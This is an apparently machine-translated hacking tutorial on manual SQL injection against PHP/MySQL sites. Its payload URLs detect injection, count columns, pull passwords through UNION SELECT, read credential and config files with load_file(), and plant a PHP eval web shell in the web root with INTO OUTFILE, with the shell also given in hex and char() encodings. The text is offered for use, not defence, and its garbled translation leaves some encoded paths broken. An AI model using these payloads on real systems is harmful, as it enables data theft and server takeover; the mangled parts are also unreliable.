Manual injection of php

Some people may say that this question is too fake, right, yes, it is a bit false, but the content is indeed prepared by myself. Hope to help you.
 
Determine whether injection exists: first, PHP and ASP determine the injection method, and add and 1 = 1, and 1 = 2 after a dynamic connection to check the returned results. if the two returned results are different, an injection point is preliminarily identified.
 
 
Determine the field size: Next, we use the order by. syntax to deal with the php guess field:
 
Http://www.bkjia.com/1.php? Id = 1 order by 40 // If the returned result is normal, it indicates that the actual field is larger than 40. Then we continue to add. always add to return error.
 
When http://www.bkjia.com/1.php? An error occurred when id = 1 order by 45, so we know that the field size is 44.
 
 
Union select: after knowing the field size, we will use the union select joint query to list all fields.
 
Http://www.bkjia.com/1.php? Id = 1 and 1 = 2 union select 1, 2, 3, 4 ~ 44/* // here we listed 44 fields and told MYSQL that our command has been executed .*
 
You can replace the field name you want to query with the corresponding field name displayed in the display, and then the field content is displayed in the from statement. For example:
 
Http://www.bkjia.com/1.php? Id = 1and 1 = 2 union select 1, 2, 3, 4 ,~ 30, passwd, 32 ,~ 45 from member /*//~ It indicates that it is omitted here. You cannot write it like this.
 
Several common MYSQL functions: Well, now we have listed all the fields. it is estimated that at this time someone should be eager to add from to guess the password. in fact, we should put the password on the back end. some people say that the functions of MYSQL are the same as those of ACCESS, or even worse. This is actually a misunderstanding, and I am wronged by MYSQL. let's take a look at the advanced use of MYSQL.
Here we first list several common Han numbers: 1: system_user () 2: user () 3: current_user4: session_user () 5: database () 6: version () 7: load_file ()...... their meanings are as follows:
 
1: system username. 2: username. 3: Current Username: 4 username for database connection. 5: database name. 6: database version. 7: Functions for MYSQL to read local files
 
What are their functions? 1-6 has the following functions:
 
The information returned by these functions plays an important role in the detection process. They have a great role in understanding our goals, analyzing our goals, finding vulnerabilities, and broadening our thinking. for example, you can understand the system version, whether the database supports union, and whether the current user is the ROOT user... function 7 plays a greater role. Let's talk about it separately.
 
This topic describes the functions and skills of the load_file () function.
OK. load_file is a function used by MYSQL to read local files. load_file has a huge effect when the permissions we inject can read and write files. how can we determine that there is a permission limit for our injection points? It's easy to add and (select count (*) from mysql after the injection point. user)> 0/* If the returned result is normal, the read/write permission is granted. we can use this function to read sensitive system files, find configuration files, Database Connection Files, social engineering files, and WEB physical paths. next, I will summarize the sensitive file list:
WINDOWS:
Load_file (char (47,119,105,110,100,111,119,115, 47,112,104,112, 46,105,110,105,) c:/windows/php. ini // do you have to say anything in it?
Load_file (char (47,119,105,110,110,116, 47,112,104,112, 46,105,110,105,) c:/winnt/php. ini
Load_file (char (47,119,105,110,100,111,119,115, 47,109,121, 46,105,110,105,) c:/windows/my. ini // the password and user name are left when the Administrator logs on to MYSQL.
Load_file (char (47,119,105,110,110,116, 47,109,121, 46,105,110,105,) c:/winnt/my. ini
Load_file (char (111,111,116, 46,105,110,105,) c:/boot. ini
 
In LUNIX/UNIX:
Load_file (char (47,101,116, 115,115,119,111,114,100, 47,)/etc/password // do not need to be said?
Load_file (char (47,117,115,114, 47,108,111, 104,116,116,112,100, 111,110,102, 47,104,116,116,112,
 
99,111,110,102, 46,)/usr/local/httpd/conf/httpd. conf // you may find the default website directory!
Load_file (char (47,117,115,114, 47,108,111, 97,112, 104,101, 99,111,110,102, 47,104,116,116,112,100,
 
111,110,102)/usr/local/apache2/conf/httpd. conf // you may find the default website directory!
FreeBSD:
Load_file (char (47) // list the root directory of the FreeBSD system
 
Some friends may call it here. What is it? What is char? What is the next string? (If the system doesn't understand, you don't have to ask. GOOGLE is your choice ).
In fact, even if you have an injection point with read and write permissions, If you directly execute load_file (c: \ boot. ini). Generally, ECHO is not displayed. In this case, you have two options. 1. Convert the path to hexadecimal format and directly submit it to the database. 2. Convert the path to the 10-digit system and use the char () function to restore it back to ASCII.
Environment such as c: \ boot. ini: "0x633A5C626F6F742E696E69", you can directly use load_file (0x633A5C626F6F742E696E69. if it is converted to a 10-digit system, it means: "99 58 92 98 111 111 116 46 105 110 105 ". you need to use char () for conversion. before conversion, you need to make a batch replacement in the TXT file, convert all spaces. that is: load_file (char (111,111,116, 46,105,110,105 )). be sure not to omit the extension number, which is symmetric.
Speaking of this, it is estimated that there is another dish to be called... it's all done. Let's go there and execute it ?! Don't worry. Check it out.
 
You only need to place load_file () on the fields displayed on the page. It is best to ensure that there are enough places to display the files you want to display. I don't have enough positions and I'm not nervous. I will teach you a few more tricks.
 
1: Sometimes, you are sure you have the right to read and write files, but you cannot read the files, or a blank space. Why? The reason may be that the other party's system has done a good job in permission configuration. Your USER permission cannot read the files in the ADMINISTRATOR. both NTFS and LINUX can achieve this. if you want to exclude the above situations, do you have to consider whether the content you read has been executed by the browser as a scripting language for HTML, ASP, PHP, ASPX, JSP, and so on? For example, if the content you read contains <> and other symbols, the browser will execute your file content and you will naturally see nothing. it is also very easy to deal with such a situation. We only need to replace those special symbols with other symbols when reading them, so that the browser will not execute them! How to replace it? We have replace (load_file (A), char (B), char (C) functions in! When you read file A, if there is A letter or character in it, MYSQL will replace B with A C letter or character, and then display it. OK. replace (load_file (A), char (60), char (32 )). here, the CHAR () function is converted to a letter, that is, once the "<" symbol is generated, it is replaced by a space. in this way, you can obtain the complete echo content.
 
2: The positions of all fields are not adequate for ECHO, and the files read are incomplete. What should I do? Here we use the Substring (str, pos, len) function to solve the problem. it means to return a substring of len characters from the position of the string 'str. for example, Substring (load_file (A), 50,100) is to display the 50th letters of the content of A to you. then we can perform a step-by-step echo.
 
Advanced use of into outfile!
OK. load_file () Let's talk about that much. Next, we have a lot to come! Here, I would like to talk about the next very important method of application, which is also part of my focus on the technology of several works of Jianxin. After we confirm the following conditions:
1. Obtain the physical path (into outfile 'physical path') to write to the directory.
2. union can be used (that is, MySQL 3 or a later version is required)
3. the other party does not filter '(because ''after outfile cannot be replaced by other functions)
4. MYSQL users have the file_priv permission (otherwise, they cannot write or read the file content)
5. systems that have write permissions on web directories generally have permissions for MS, but LINUX generally uses rwxr-xr-x, which means that the group and other users do not have the permission to write.
 
In this example, we can generate an error message from the database. If not, we can obtain it through load_file. 2. That's generally okay... 3. It is rare to filter. 4. Do you have the permission? We have tested it before. 5. If we cannot back up the path to the website, we also have other methods, such as going to starup, run, and so on. generally, you can try uploading directories and image directories. Most of them have read and write permissions.
OK. the required conditions are determined. How can this problem be used? We separate the two parts for usage.
 
Usage 1: This is a regular usage. We all know that the website's message, upload, and other functions are used to get your sentence and then use it.
 
Http://www.bkjia.com/coder. php? Id = 1 and 1 = 2 union select 1, load_file (/www/home/html/upload/qingyafengping.jpg), 3, 4, 5, 6 into outfile '/www/home/html/coder. php '/* your pony is born.
 
Here,/www/home/html/upload/qingyafengping.jpg is your uploaded Trojan address. 3, 4, 5, and 6 are assumed to have a field, And/www/home/html/is the WEB path.
 
 
Usage 2 is also important. The above method has great limitations. What should I do if the website does not upload you or filter the uploaded content? Don't be afraid. Jian Xin gave us a good idea a few years ago. We just need to execute the URL directly like this:
 
 
Http://www.tiany6.com/coder.php? Id = 1 and 1 = 2 union select 1, char (here is your horse code, remember to convert it to 10 or 16), 3,4, 5, 6 into outfile '/www/home/html/coder. php '/* So your pony is born, and you don't need to upload it or filter it out.
 
For example
 
Http://www.tiany6.com/coder.php? Id = 1 and 1 = 2 union select 1, char (60, 63, 112,104,112, 32,101,118, 97,108, 40, 36, 99,109,100, 80, 62, 5, 6 into outfile '/www/home/html/coder. php '/*
Or
Http://www.tiany6.com/coder.php? Id = 1 and 1 = 2 union select 1, 0x3C3F706870206576616C28245F504F53545B636D645D293F3E, 3,4, 5, 6 into outfile '/www/home/html/coder. php '/*
Or
Http://www.tiany6.com/coder.php? Id = 1 and 1 = 2 union select 1, '<? Php eval ($ _ POST [cmd])?> ', 3, 4, 5, 6 into outfile'/www/home/html/coder. php '/*
 
3, 4, 5, and 6 are assumed to have fields, And/www/home/html/is assumed to be the WEB path.


From the hacker's XFile Blackeagle